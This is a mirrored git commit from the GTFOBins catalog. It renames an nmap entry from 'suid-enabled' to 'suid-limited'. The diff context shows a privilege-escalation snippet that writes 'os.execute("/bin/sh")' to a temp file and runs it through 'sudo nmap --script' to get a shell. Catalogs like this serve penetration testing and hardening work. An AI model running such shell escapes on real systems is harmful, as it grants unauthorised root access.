mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Fix nmap suid-limited
This commit is contained in:
parent
0681eacca5
commit
8fb329ca92
@ -82,7 +82,7 @@ functions:
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
sudo nmap --script=$TF
|
||||
suid-enabled:
|
||||
suid-limited:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
|
Loading…
Reference in New Issue
Block a user